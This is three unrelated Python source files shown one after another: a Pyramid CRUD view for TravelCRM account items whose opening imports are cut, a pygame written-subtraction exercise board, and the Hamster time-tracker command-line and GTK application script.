from ..lib.bl.subscriptions import subscribe_resource
from ..lib.utils.common_utils import translate as _
from ..forms.accounts_items import (
AccountItemForm,
AccountItemSearchForm
)
from ..lib.events.resources import (
ResourceCreated,
ResourceChanged,
ResourceDeleted,
)
log = logging.getLogger(__name__)
@view_defaults(
    context='..resources.accounts_items.AccountsItemsResource',
)
class AccountsItemsView(BaseView):
    """CRUD, copy and subscription views for AccountItem resources.

    Each action is exposed as a GET view that renders a page/form and a
    POST (JSON) view that performs it.
    """

    @view_config(
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/index.mako',
        permission='view'
    )
    def index(self):
        """Render the accounts-items index page."""
        return {
            'title': self._get_title(),
        }

    @view_config(
        name='list',
        xhr='True',
        request_method='POST',
        renderer='json',
        permission='view'
    )
    def list(self):
        """Serve the searchable grid data as JSON."""
        form = AccountItemSearchForm(self.request, self.context)
        form.validate()
        qb = form.submit()
        return qb.get_serialized()

    @view_config(
        name='view',
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/form.mako',
        permission='view'
    )
    def view(self):
        """Render a read-only form; a 'rid' param is first resolved to an id."""
        if self.request.params.get('rid'):
            resource_id = self.request.params.get('rid')
            account_item = AccountItem.by_resource_id(resource_id)
            return HTTPFound(
                location=self.request.resource_url(
                    self.context, 'view', query={'id': account_item.id}
                )
            )
        result = self.edit()
        result.update({
            'title': self._get_title(_(u'View')),
            'readonly': True,
        })
        return result

    @view_config(
        name='add',
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/form.mako',
        permission='add'
    )
    def add(self):
        """Render an empty creation form."""
        return {
            'title': self._get_title(_(u'Add')),
        }

    @view_config(
        name='add',
        request_method='POST',
        renderer='json',
        permission='add'
    )
    def _add(self):
        """Create a new account item from the submitted form."""
        form = AccountItemForm(self.request)
        if form.validate():
            account_item = form.submit()
            DBSession.add(account_item)
            DBSession.flush()
            event = ResourceCreated(self.request, account_item)
            event.registry()
            return {
                'success_message': _(u'Saved'),
                'response': account_item.id
            }
        else:
            return {
                'error_message': _(u'Please, check errors'),
                'errors': form.errors
            }

    @view_config(
        name='edit',
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/form.mako',
        permission='edit'
    )
    def edit(self):
        """Render the edit form for the item identified by 'id'."""
        account_item = AccountItem.get(self.request.params.get('id'))
        return {
            'item': account_item,
            'title': self._get_title(_(u'Edit')),
        }

    @view_config(
        name='edit',
        request_method='POST',
        renderer='json',
        permission='edit'
    )
    def _edit(self):
        """Apply the submitted form to an existing account item."""
        account_item = AccountItem.get(self.request.params.get('id'))
        form = AccountItemForm(self.request)
        if form.validate():
            form.submit(account_item)
            event = ResourceChanged(self.request, account_item)
            event.registry()
            return {
                'success_message': _(u'Saved'),
                'response': account_item.id
            }
        else:
            return {
                'error_message': _(u'Please, check errors'),
                'errors': form.errors
            }

    @view_config(
        name='copy',
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/form.mako',
        permission='add'
    )
    def copy(self):
        """Render the add form prefilled from an existing item."""
        account_item = AccountItem.get_copy(self.request.params.get('id'))
        return {
            'action': self.request.path_url,
            'item': account_item,
            'title': self._get_title(_(u'Copy')),
        }

    @view_config(
        name='copy',
        request_method='POST',
        renderer='json',
        permission='add'
    )
    def _copy(self):
        """Submitting a copy is identical to adding a new item."""
        return self._add()

    @view_config(
        name='delete',
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/delete.mako',
        permission='delete'
    )
    def delete(self):
        """Render the delete-confirmation dialog."""
        return {
            'title': self._get_title(_(u'Delete')),
            'rid': self.request.params.get('rid')
        }

    @view_config(
        name='delete',
        request_method='POST',
        renderer='json',
        permission='delete'
    )
    def _delete(self):
        """Delete the selected items; roll the transaction back on failure."""
        errors = False
        ids = self.request.params.getall('id')
        if ids:
            try:
                items = DBSession.query(AccountItem).filter(
                    AccountItem.id.in_(ids)
                )
                for item in items:
                    DBSession.delete(item)
                    event = ResourceDeleted(self.request, item)
                    event.registry()
                DBSession.flush()
            except Exception:
                # BUGFIX: was a bare "except:", which also swallowed
                # SystemExit/KeyboardInterrupt.  Any failure marks the batch
                # as errored and rolls back.
                errors = True
                DBSession.rollback()
        if errors:
            return {
                # msgid kept verbatim (even with its typo) so existing
                # translation catalogs keep matching.
                'error_message': _(
                    u'Some objects could not be delete'
                ),
            }
        return {'success_message': _(u'Deleted')}

    @view_config(
        name='subscribe',
        request_method='GET',
        renderer='travelcrm:templates/accounts_items/subscribe.mako',
        permission='view'
    )
    def subscribe(self):
        """Render the subscribe dialog."""
        return {
            'id': self.request.params.get('id'),
            'title': self._get_title(_(u'Subscribe')),
        }

    @view_config(
        name='subscribe',
        request_method='POST',
        renderer='json',
        permission='view'
    )
    def _subscribe(self):
        """Subscribe the current user to each selected item's resource."""
        ids = self.request.params.getall('id')
        for id in ids:
            account_item = AccountItem.get(id)
            subscribe_resource(self.request, account_item.resource)
        return {
            'success_message': _(u'Subscribed'),
        }
|
import classes.level_controller as lc
import classes.game_driver as gd
import classes.extras as ex
import classes.board
import random
import pygame
class Board(gd.BoardGame):
    """Written-subtraction exercise board: the player solves n1 - n2 column
    by column, with borrow ("-1") and carry ("+10") helper boxes above the
    digits.  Keyboard arrows move between boxes; digits fill them in."""

    def __init__(self, mainloop, speaker, config, screen_w, screen_h):
        # 5 levels-to-complete, 10 difficulty levels; 13x11 default grid.
        self.level = lc.Level(self,mainloop,5,10)
        gd.BoardGame.__init__(self,mainloop,speaker,config,screen_w,screen_h,13,11)

    def create_game_objects(self, level = 1):
        """Pick the operands for the current difficulty level and lay out the
        question, borrow/carry boxes, operand digits, line and answer boxes."""
        self.board.decolorable = False
        self.board.draw_grid = False
        color = (234,218,225)
        self.color = color
        self.grey = (200,200,200)
        self.font_hl = (100,0,250)
        self.task_str_color = ex.hsv_to_rgb(200,200,230)
        self.activated_col = self.font_hl
        white = (255,255,255)
        self.bg_col = white
        self.top_line = 3#self.board.scale//2
        if self.mainloop.scheme is not None:
            if self.mainloop.scheme.dark:
                self.bg_col = (0,0,0)
        self.level.games_per_lvl = 5
        # rngs = [n1_min, n1_max, n2_min, n2_max]; the ranges guarantee
        # n1 > n2, so the difference is always positive.
        if self.level.lvl == 1:
            rngs = [20,50,10,19]
            self.level.games_per_lvl = 3
        elif self.level.lvl == 2:
            rngs = [50,100,20,49]
            self.level.games_per_lvl = 3
        elif self.level.lvl == 3:
            rngs = [100,250,50,99]
            self.level.games_per_lvl = 3
        elif self.level.lvl == 4:
            rngs = [250,500,100,249]
        elif self.level.lvl == 5:
            rngs = [500,1000,100,499]
        elif self.level.lvl == 6:
            rngs = [700,1500,250,699]
        elif self.level.lvl == 7:
            rngs = [1500,2500,500,1499]
        elif self.level.lvl == 8:
            rngs = [2500,5000,1500,2499]
        elif self.level.lvl == 9:
            rngs = [5000,10000,2500,4999]
        elif self.level.lvl == 10:
            rngs = [10000,84999,5000,9999]
        data = [39,18]
        self.points = self.level.lvl
        #stretch width to fit the screen size
        x_count = self.get_x_count(data[1],even=None)
        if x_count > 39:
            data[0] = x_count
        self.data = data
        self.vis_buttons = [1,1,1,1,1,1,1,0,0]
        self.mainloop.info.hide_buttonsa(self.vis_buttons)
        self.layout.update_layout(data[0],data[1])
        scale = self.layout.scale
        self.board.level_start(data[0],data[1],scale)
        self.n1 = random.randrange(rngs[0],rngs[1])
        self.n2 = random.randrange(rngs[2],rngs[3])
        self.sumn1n2 = self.n1-self.n2
        # string forms and digit counts drive the grid layout below
        self.n1s = str(self.n1)
        self.n2s = str(self.n2)
        self.sumn1n2s = str(self.sumn1n2)
        self.n1sl = len(self.n1s)
        self.n2sl = len(self.n2s)
        self.sumn1n2sl =len(self.sumn1n2s)
        self.cursor_pos = 0
        self.correct = False
        self.carry1l = []     # "-1" borrow boxes (top row)
        self.carry10l = []    # "+10" carry boxes (second row)
        self.resultl = []     # answer digit boxes (bottom row)
        self.nums1l = []      # first operand digit labels
        self.nums2l = []      # second operand digit labels
        self.ship_id = 0
        self.digits = ["0","1","2","3","4","5","6","7","8","9"]
        # Greek uses ";" as the question mark
        if self.lang.lang == 'el':
            qm = ";"
        else:
            qm = "?"
        question = self.n1s + " - " + self.n2s + " = " + qm
        self.board.add_unit(1,0,data[0]-3-(max(self.n1sl,self.n2sl))*3 ,3,classes.board.Label,question,self.bg_col,"",21)
        self.board.units[-1].align = 1
        #borrow 1
        for i in range(self.n1sl - 1):
            self.board.add_unit(data[0]-6-i*3,0,1,1,classes.board.Label,"-",self.bg_col,"",0)
            self.board.add_unit(data[0]-5-i*3,0,1,1,classes.board.Letter,"",self.bg_col,"",1)
            self.carry1l.append(self.board.ships[-1])
            self.carry1l[-1].set_outline(self.grey, 2)
            self.carry1l[-1].pos_id = i
            self.board.units[-1].align = 2
        #add 10
        for i in range(self.n1sl - 1):
            self.board.add_unit(data[0]-3-i*3,1,1,1,classes.board.Label,"+",self.bg_col,"",0)
            self.board.add_unit(data[0]-2-i*3,1,1,1,classes.board.Letter,"",self.bg_col,"",1)
            self.carry10l.append(self.board.ships[-1])
            self.carry10l[-1].set_outline(self.grey, 2)
            self.carry10l[-1].pos_id = i
            self.board.units[-1].align = 2
        self.board.add_unit(data[0]-2-self.n1sl*3,0,2,1,classes.board.Label,"-1",self.bg_col,"",0)
        self.board.add_unit(data[0]-2-self.n1sl*3,1,2,1,classes.board.Label,"+10",self.bg_col,"",0)
        #first number
        for i in range(self.n1sl):
            self.board.add_unit(data[0]-3-i*3,2,3,3,classes.board.Label,self.n1s[-(i+1)],self.bg_col,"",21)
            self.nums1l.append(self.board.units[-1])
            self.nums1l[-1].font_color = self.grey
            self.nums1l[-1].pos_id = i
        #second number
        i = 0
        for i in range(self.n2sl):
            self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,self.n2s[-(i+1)],self.bg_col,"",21)
            self.nums2l.append(self.board.units[-1])
            self.nums2l[-1].pos_id = i
        i += 1
        self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,"-",self.bg_col,"",21)
        self.plus_label = self.board.units[-1]
        #line
        #line = "―" * (self.sumn1n2sl*2)
        self.board.add_unit(data[0]-self.sumn1n2sl*3,8,self.sumn1n2sl*3,1,classes.board.Label,"",self.bg_col,"",21)
        self.draw_hori_line(self.board.units[-1])
        #self.board.units[-1].text_wrap = False
        #result
        for i in range(self.sumn1n2sl):
            self.board.add_unit(data[0]-3-i*3,9,3,3,classes.board.Letter,"",self.bg_col,"",21)
            self.resultl.append(self.board.ships[-1])
            self.resultl[-1].set_outline(self.grey, 2)
            self.resultl[-1].pos_id = i
        # start with the rightmost (units) answer box active
        self.resultl[0].set_outline(self.activated_col, 3)
        self.home_square = self.resultl[0]
        self.board.active_ship = self.home_square.unit_id
        self.activable_count = len(self.board.ships)
        for each in self.board.ships:
            each.immobilize()
        self.deactivate_colors()
        self.reactivate_colors()

    def draw_hori_line(self,unit):
        """Paint the horizontal rule between the operands and the result."""
        w = unit.grid_w*self.board.scale
        h = unit.grid_h*self.board.scale
        center = [w//2,h//2]
        canv = pygame.Surface([w, h-1])
        canv.fill(self.bg_col)
        pygame.draw.line(canv,self.grey,(0,self.top_line),(w,self.top_line),3)
        unit.painting = canv.copy()
        unit.update_me = True

    def handle(self,event):
        """Route keyboard/mouse events: arrows move the active box, digits
        edit it, Backspace clears; carry/borrow boxes are kept in sync."""
        gd.BoardGame.handle(self, event) #send event handling up
        if self.show_msg == False:
            if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:
                self.home_sqare_switch(self.board.active_ship+1)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:
                self.home_sqare_switch(self.board.active_ship-1)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_UP:
                if self.home_square in self.resultl:
                    self.home_sqare_switch(self.board.active_ship-self.n1sl+1)
                elif self.home_square in self.carry10l:
                    self.home_sqare_switch(self.board.active_ship-self.n1sl+1)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:
                self.home_sqare_switch(self.board.active_ship+self.n1sl-1)
            elif event.type == pygame.KEYDOWN and event.key != pygame.K_RETURN and not self.correct:
                lhv = len(self.home_square.value)
                self.changed_since_check = True
                if event.key == pygame.K_BACKSPACE:
                    if lhv > 0:
                        self.home_square.value = self.home_square.value[0:lhv-1]
                else:
                    char = event.unicode
                    if (len(char)>0 and lhv < 3 and char in self.digits):
                        if self.home_square in self.resultl:
                            if lhv == 1:
                                # second digit typed: keep only a sensible
                                # single-digit value (mod 10 for 10..19)
                                s = self.home_square.value + char
                                if s[0] == "0":
                                    self.home_square.value = char
                                else:
                                    n = int(s)
                                    if n < 20:
                                        self.home_square.value = str(n % 10)
                                    else:
                                        self.home_square.value = char
                            else:
                                self.home_square.value = char
                        elif self.home_square in self.carry1l:
                            # borrow box accepts only "1"; mirror into the
                            # matching "+10" box
                            if char == "1":
                                self.home_square.value = "1"
                                self.carry10l[self.home_square.pos_id].value = "10"
                            else:
                                self.home_square.value = ""
                                self.carry10l[self.home_square.pos_id].value = ""
                            self.carry10l[self.home_square.pos_id].update_me = True
                        elif self.home_square in self.carry10l:
                            # carry box accepts only "10"; mirror into "-1"
                            if lhv == 0:
                                if char == "1":
                                    self.home_square.value = "10"
                            elif lhv == 1:
                                if char == "0":
                                    self.home_square.value = "10"
                                else:
                                    self.home_square.value = ""
                            else:
                                if char == "1":
                                    self.home_square.value = "10"
                                else:
                                    self.home_square.value = ""
                            if self.home_square.value == "10":
                                self.carry1l[self.home_square.pos_id].value = "1"
                            else:
                                self.carry1l[self.home_square.pos_id].value = ""
                            self.carry1l[self.home_square.pos_id].update_me = True
                self.home_square.update_me = True
                self.mainloop.redraw_needed[0] = True
            elif event.type == pygame.MOUSEBUTTONUP:
                self.home_sqare_switch(self.board.active_ship)

    def home_sqare_switch(self, activate):
        """Make ship *activate* the active (highlighted) input box, wrapping
        out-of-range indices back to the first result box."""
        if activate < 0 or activate > self.activable_count:
            activate = self.activable_count - self.sumn1n2sl
        if activate >= 0 and activate < self.activable_count:
            self.board.active_ship = activate
            self.home_square.update_me = True
        if self.board.active_ship >= 0:
            self.home_square.set_outline(self.grey, 2)
            self.deactivate_colors()
            self.home_square = self.board.ships[self.board.active_ship]
            self.home_square.set_outline(self.activated_col, 3)
            self.reactivate_colors()
            self.home_square.font_color = self.font_hl
            self.home_square.update_me = True
        self.mainloop.redraw_needed[0] = True

    def deactivate_colors(self):
        """Grey out every box and label."""
        for each in self.board.ships:
            each.font_color = self.grey
            each.update_me = True
        for each in self.board.units:
            each.font_color = self.grey
            each.update_me = True

    def reactivate_colors(self):
        """Highlight the active box plus the column/partner boxes that
        belong to the same subtraction step."""
        self.plus_label.font_color = self.font_hl
        self.board.units[0].font_color = self.task_str_color
        if self.home_square in self.carry1l:
            self.carry10l[self.home_square.pos_id].font_color = self.font_hl
        elif self.home_square in self.carry10l:
            self.carry1l[self.home_square.pos_id].font_color = self.font_hl
        elif self.home_square in self.resultl:
            if self.home_square.pos_id > 0:
                self.carry1l[self.home_square.pos_id-1].font_color = self.font_hl
            if self.home_square.pos_id >= 0 and self.home_square.pos_id < self.n1sl-1:
                self.carry10l[self.home_square.pos_id].font_color = self.font_hl
            if (self.n1sl > self.home_square.pos_id):
                self.nums1l[self.home_square.pos_id].font_color = self.font_hl
            if (self.n2sl > self.home_square.pos_id):
                self.nums2l[self.home_square.pos_id].font_color = self.font_hl
            self.resultl[self.home_square.pos_id].font_color = self.font_hl

    def update(self,game):
        game.fill(self.color)
        gd.BoardGame.update(self, game) #rest of painting done by parent

    def check_result(self):
        """Concatenate the answer boxes (most significant first) and score."""
        s = ""
        for each in reversed(self.resultl):
            s += each.value
        if s == self.sumn1n2s:
            self.update_score(self.points)
            self.level.next_board()
        else:
            if self.points > 0:
                self.points -= 1
            self.level.try_again()
|
'''A script to control the applet from the command line.'''
import sys, os
import argparse
import re
import gi
gi.require_version('Gdk', '3.0') # noqa: E402
gi.require_version('Gtk', '3.0') # noqa: E402
from gi.repository import GLib as glib
from gi.repository import Gdk as gdk
from gi.repository import Gtk as gtk
from gi.repository import Gio as gio
from gi.repository import GLib as glib
import hamster
from hamster import client, reports
from hamster import logger as hamster_logger
from hamster.about import About
from hamster.edit_activity import CustomFactController
from hamster.overview import Overview
from hamster.preferences import PreferencesEditor
from hamster.lib import default_logger, stuff
from hamster.lib import datetime as dt
from hamster.lib.fact import Fact
logger = default_logger(__file__)
def word_wrap(line, max_len):
    """Primitive greedy word wrapper.

    Splits *line* on whitespace and packs words into output lines so that
    each candidate "current + ' ' + word" stays strictly under *max_len*
    characters.  A single word longer than the limit still gets a line of
    its own (it is never truncated).

    Note: the length test includes a joining space even before the first
    word of a line, so an isolated word of exactly max_len - 1 characters
    also starts a fresh line.

    Args:
        line (str): text to wrap.
        max_len (int): wrap threshold.

    Returns:
        list[str]: the wrapped lines (empty for blank input).
    """
    # the original also initialised an unused 'cur_len' counter; removed
    lines = []
    cur_line = ""
    for word in line.split():
        if len("%s %s" % (cur_line, word)) < max_len:
            cur_line = ("%s %s" % (cur_line, word)).strip()
        else:
            if cur_line:
                lines.append(cur_line)
            cur_line = word
    if cur_line:
        lines.append(cur_line)
    return lines
def fact_dict(fact_data, with_date):
    """Flatten a fact object into a dict of display strings for listing.

    Args:
        fact_data: a fact with start_time/end_time (datetime or None for an
            ongoing fact), delta (has .format()), activity, category, tags
            (iterable of str) and description attributes.
        with_date (bool): include the date in start/end timestamps.

    Returns:
        dict: keys start, end, duration, activity, category, tags,
        description -- all strings ready for column formatting.
    """
    fact = {}
    fmt = '%Y-%m-%d %H:%M' if with_date else '%H:%M'
    fact['start'] = fact_data.start_time.strftime(fmt)
    # an ongoing fact has no end time; show it as blank
    # (a dead "end_date = dt.datetime.now()" assignment was removed here)
    if fact_data.end_time:
        fact['end'] = fact_data.end_time.strftime(fmt)
    else:
        fact['end'] = ''
    fact['duration'] = fact_data.delta.format()
    fact['activity'] = fact_data.activity
    fact['category'] = fact_data.category
    if fact_data.tags:
        fact['tags'] = ' '.join('#%s' % tag for tag in fact_data.tags)
    else:
        fact['tags'] = ''
    fact['description'] = fact_data.description
    return fact
class Hamster(gtk.Application):
    """Hamster gui.

    Actions should eventually be accessible via Gio.DBusActionGroup
    with the 'org.gnome.Hamster.GUI' id.
    but that is still experimental, the actions API is subject to change.
    Discussion with "external" developers welcome !
    The separate dbus org.gnome.Hamster.WindowServer
    is still the stable recommended way to show windows for now.
    """
    def __init__(self):
        # inactivity_timeout: How long (ms) the service should stay alive
        #                     after all windows have been closed.
        gtk.Application.__init__(self,
                                 application_id="org.gnome.Hamster.GUI",
                                 #inactivity_timeout=10000,
                                 register_session=True)
        self.about_controller = None  # 'about' window controller
        self.fact_controller = None  # fact window controller
        self.overview_controller = None  # overview window controller
        self.preferences_controller = None  # settings window controller
        self.connect("startup", self.on_startup)
        self.connect("activate", self.on_activate)
        # we need them before the startup phase
        # so register/activate_action work before the app is ran.
        # cf. https://gitlab.gnome.org/GNOME/glib/blob/master/gio/tests/gapplication-example-actions.c
        self.add_actions()
    def add_actions(self):
        """Register the application's Gio actions (before the startup phase).

        Most actions take no parameter; "edit" and "clone" take an int32
        fact id -- pack with Variant.new_int32(), unpack with .get_int32().
        """
        for name in ("about", "add", "clone", "edit", "overview", "preferences"):
            data_type = glib.VariantType("i") if name in ("edit", "clone") else None
            action = gio.SimpleAction.new(name, data_type)
            action.connect("activate", self.on_activate_window)
            self.add_action(action)
        action = gio.SimpleAction.new("quit", None)
        action.connect("activate", self.on_activate_quit)
        self.add_action(action)
    def on_activate(self, data=None):
        """Default activation: show the overview if no window is up yet."""
        logger.debug("activate")
        if not self.get_windows():
            self.activate_action("overview")
    def on_activate_window(self, action=None, data=None):
        """Window actions all funnel into _open_window, keyed by action name."""
        self._open_window(action.get_name(), data)
    def on_activate_quit(self, data=None):
        # BUGFIX: this handler used to call itself (self.on_activate_quit()),
        # which recursed forever instead of quitting. Delegate to
        # Gtk.Application.quit() to actually exit the main loop.
        self.quit()
    def on_startup(self, data=None):
        logger.debug("startup")
        # Must be the same as application_id. Won't be required with gtk4.
        glib.set_prgname(self.get_application_id())
        # localized name, but let's keep it simple.
        glib.set_application_name("Hamster")
    def _open_window(self, name, data=None):
        """Create (or reuse) the controller for *name* and present its window.

        name is one of "about", "add", "clone", "edit", "overview",
        "preferences"; data is the optional GLib.Variant action parameter
        (the fact id for "edit"/"clone").
        """
        logger.debug("opening '{}'".format(name))
        if name == "about":
            if not self.about_controller:
                # silence warning "GtkDialog mapped without a transient parent"
                # https://stackoverflow.com/a/38408127/3565696
                _dummy = gtk.Window()
                self.about_controller = About(parent=_dummy)
                logger.debug("new About")
            controller = self.about_controller
        elif name in ("add", "clone", "edit"):
            if self.fact_controller:
                # Something is already going on, with other arguments, present it.
                # Or should we just discard the forgotten one ?
                logger.warning("Fact controller already active. Please close first.")
            else:
                fact_id = data.get_int32() if data else None
                self.fact_controller = CustomFactController(name, fact_id=fact_id)
                logger.debug("new CustomFactController")
            controller = self.fact_controller
        elif name == "overview":
            if not self.overview_controller:
                self.overview_controller = Overview()
                logger.debug("new Overview")
            controller = self.overview_controller
        elif name == "preferences":
            if not self.preferences_controller:
                self.preferences_controller = PreferencesEditor()
                logger.debug("new PreferencesEditor")
            controller = self.preferences_controller
        window = controller.window
        if window not in self.get_windows():
            self.add_window(window)
            logger.debug("window added")
        # Essential for positioning on wayland.
        # This should also select the correct window type if unset yet.
        # https://specifications.freedesktop.org/wm-spec/wm-spec-1.3.html
        if name != "overview" and self.overview_controller:
            window.set_transient_for(self.overview_controller.window)
            # so the dialog appears on top of the transient-for:
            window.set_type_hint(gdk.WindowTypeHint.DIALOG)
        else:
            # toplevel
            window.set_transient_for(None)
        controller.present()
        logger.debug("window presented")
    def present_fact_controller(self, action, fact_id=0):
        """Present the fact controller window to add, clone or edit a fact.

        Args:
            action (str): "add", "clone" or "edit"
        """
        assert action in ("add", "clone", "edit")
        if action in ("clone", "edit"):
            action_data = glib.Variant.new_int32(int(fact_id))
        else:
            action_data = None
        # always open dialogs through actions,
        # both for consistency, and to reduce the paths to test.
        app.activate_action(action, action_data)
class HamsterCli(object):
    """Command line interface.

    Thin wrapper over the hamster storage client; each public method is a
    CLI subcommand dispatched from the __main__ block below.
    """
    def __init__(self):
        self.storage = client.Storage()
    def assist(self, *args):
        """Print shell-completion candidates for the given subcommand."""
        assist_command = args[0] if args else ""
        if assist_command == "start":
            hamster_client._activities(sys.argv[-1])
        elif assist_command == "export":
            formats = "html tsv xml ical".split()
            chosen = sys.argv[-1]
            formats = [f for f in formats if not chosen or f.startswith(chosen)]
            print("\n".join(formats))
    def toggle(self):
        """Toggle tracking on/off via the storage backend."""
        self.storage.toggle()
    def start(self, *args):
        '''Start a new activity.

        Returns the new fact id, or 0 when no activity was given.
        '''
        if not args:
            print("Error: please specify activity")
            return 0
        fact = Fact.parse(" ".join(args), range_pos="tail")
        if fact.start_time is None:
            fact.start_time = dt.datetime.now()
        self.storage.check_fact(fact, default_day=dt.hday.today())
        id_ = self.storage.add_fact(fact)
        return id_
    def stop(self, *args):
        '''Stop tracking the current activity.'''
        self.storage.stop_tracking()
    def export(self, *args):
        '''Export facts in the given format ("html" default) and date range.'''
        args = args or []
        export_format, start_time, end_time = "html", None, None
        if args:
            export_format = args[0]
            (start_time, end_time), __ = dt.Range.parse(" ".join(args[1:]))
        start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time())
        end_time = end_time or start_time.replace(hour=23, minute=59, second=59)
        facts = self.storage.get_facts(start_time, end_time)
        # reports.simple() is invoked for its side effects; its return value
        # was previously bound to an unused 'writer' local.
        reports.simple(facts, start_time.date(), end_time.date(), export_format)
    def _activities(self, search=""):
        '''Print the names of all the activities.'''
        if "@" in search:
            activity, category = search.split("@")
            for cat in self.storage.get_categories():
                if not category or cat['name'].lower().startswith(category.lower()):
                    print("{}@{}".format(activity, cat['name']))
        else:
            # print both the bare name and the name@category form so shell
            # completion can offer either
            for activity in self.storage.get_activities(search):
                print(activity['name'])
                if activity['category']:
                    print("{}@{}".format(activity['name'], activity['category']))
    def activities(self, *args):
        '''Print the names of all the activities.'''
        search = args[0] if args else ""
        for activity in self.storage.get_activities(search):
            print("{}@{}".format(activity['name'], activity['category']))
    def categories(self, *args):
        '''Print the names of all the categories.'''
        for category in self.storage.get_categories():
            print(category['name'])
    def list(self, *times):
        """list facts within a date range"""
        (start_time, end_time), __ = dt.Range.parse(" ".join(times or []))
        start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time())
        end_time = end_time or start_time.replace(hour=23, minute=59, second=59)
        self._list(start_time, end_time)
    def current(self, *args):
        """prints current activity. kinda minimal right now"""
        facts = self.storage.get_todays_facts()
        if facts and not facts[-1].end_time:
            print("{} {}".format(str(facts[-1]).strip(),
                                 facts[-1].delta.format(fmt="HH:MM")))
        else:
            print(_("No activity"))
    def search(self, *args):
        """search for activities by name and optionally within a date range"""
        args = args or []
        search = ""
        if args:
            search = args[0]
        (start_time, end_time), __ = dt.Range.parse(" ".join(args[1:]))
        start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time())
        end_time = end_time or start_time.replace(hour=23, minute=59, second=59)
        self._list(start_time, end_time, search)
    def _list(self, start_time, end_time, search=""):
        """Print a listing of activities"""
        facts = self.storage.get_facts(start_time, end_time, search)
        headers = {'activity': _("Activity"),
                   'category': _("Category"),
                   'tags': _("Tags"),
                   'description': _("Description"),
                   'start': _("Start"),
                   'end': _("End"),
                   'duration': _("Duration")}
        # print date if it is not the same day
        print_with_date = start_time.date() != end_time.date()
        cols = 'start', 'end', 'duration', 'activity', 'category'
        # first pass: work out each column's display width
        widths = dict([(col, len(headers[col])) for col in cols])
        for fact in facts:
            fact = fact_dict(fact, print_with_date)
            for col in cols:
                widths[col] = max(widths[col], len(fact[col]))
        cols = ["{{{col}: <{len}}}".format(col=col, len=widths[col]) for col in cols]
        fact_line = " | ".join(cols)
        row_width = sum(val + 3 for val in list(widths.values()))
        print()
        print(fact_line.format(**headers))
        print("-" * min(row_width, 80))
        # second pass: print rows while accumulating per-category totals
        by_cat = {}
        for fact in facts:
            cat = fact.category or _("Unsorted")
            by_cat.setdefault(cat, dt.timedelta(0))
            by_cat[cat] += fact.delta
            pretty_fact = fact_dict(fact, print_with_date)
            print(fact_line.format(**pretty_fact))
            if pretty_fact['description']:
                for line in word_wrap(pretty_fact['description'], 76):
                    print("    {}".format(line))
            if pretty_fact['tags']:
                for line in word_wrap(pretty_fact['tags'], 76):
                    print("    {}".format(line))
        print("-" * min(row_width, 80))
        cats = []
        total_duration = dt.timedelta()
        for cat, duration in sorted(by_cat.items(), key=lambda x: x[1], reverse=True):
            cats.append("{}: {}".format(cat, duration.format()))
            total_duration += duration
        for line in word_wrap(", ".join(cats), 80):
            print(line)
        print("Total: ", total_duration.format())
        print()
    def version(self):
        """Print the installed hamster version."""
        print(hamster.__version__)
if __name__ == '__main__':
    from hamster.lib import i18n
    i18n.setup_i18n()
    usage = _(
        """
Actions:
    * add [activity [start-time [end-time]]]: Add an activity
    * stop: Stop tracking current activity.
    * list [start-date [end-date]]: List activities
    * search [terms] [start-date [end-date]]: List activities matching a search
      term
    * export [html|tsv|ical|xml] [start-date [end-date]]: Export activities with
      the specified format
    * current: Print current activity
    * activities: List all the activities names, one per line.
    * categories: List all the categories names, one per line.
    * overview / preferences / add / about: launch specific window
    * version: Show the Hamster version
Time formats:
    * 'YYYY-MM-DD hh:mm': If start-date is missing, it will default to today.
      If end-date is missing, it will default to start-date.
    * '-minutes': Relative time in minutes from the current date and time.
Note:
    * For list/search/export a "hamster day" starts at the time set in the
      preferences (default 05:00) and ends one minute earlier the next day.
      Activities are reported for each "hamster day" in the interval.
Example usage:
    hamster start bananas -20
        start activity 'bananas' with start time 20 minutes ago
    hamster search pancakes 2012-08-01 2012-08-30
        look for an activity matching terms 'pancakes` between 1st and 30st
        August 2012. Will check against activity, category, description and tags
""")
    hamster_client = HamsterCli()
    app = Hamster()
    logger.debug("app instanciated")
    import signal
    signal.signal(signal.SIGINT, signal.SIG_DFL)  # gtk3 screws up ctrl+c
    parser = argparse.ArgumentParser(
        description="Time tracking utility",
        epilog=usage,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    # cf. https://stackoverflow.com/a/28611921/3565696
    parser.add_argument("--log", dest="log_level",
                        choices=('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'),
                        default='WARNING',
                        help="Set the logging level (default: %(default)s)")
    parser.add_argument("action", nargs="?", default="overview")
    parser.add_argument('action_args', nargs=argparse.REMAINDER, default=[])
    args, unknown_args = parser.parse_known_args()
    # logger for current script
    logger.setLevel(args.log_level)
    # hamster_logger for the rest
    hamster_logger.setLevel(args.log_level)
    if not hamster.installed:
        logger.info("Running in devel mode")
    # normalize command aliases before dispatching
    if args.action in ("start", "track"):
        action = "add"  # alias
    elif args.action == "prefs":
        # for backward compatibility
        action = "preferences"
    else:
        action = args.action
    # GUI actions go through the Gtk application; everything else is
    # dispatched to the matching HamsterCli method.
    # NOTE(review): "clone" is registered as an app action but is not
    # reachable from this list -- confirm whether that is intentional.
    if action in ("about", "add", "edit", "overview", "preferences"):
        if action == "add" and args.action_args:
            assert not unknown_args, "unknown options: {}".format(unknown_args)
            # directly add fact from arguments
            id_ = hamster_client.start(*args.action_args)
            assert id_ > 0, "failed to add fact"
            sys.exit(0)
        else:
            app.register()
            if action == "edit":
                assert len(args.action_args) == 1, (
                    "edit requires exactly one argument, got {}"
                    .format(args.action_args))
                id_ = int(args.action_args[0])
                assert id_ > 0, "received non-positive id : {}".format(id_)
                action_data = glib.Variant.new_int32(id_)
            else:
                action_data = None
            app.activate_action(action, action_data)
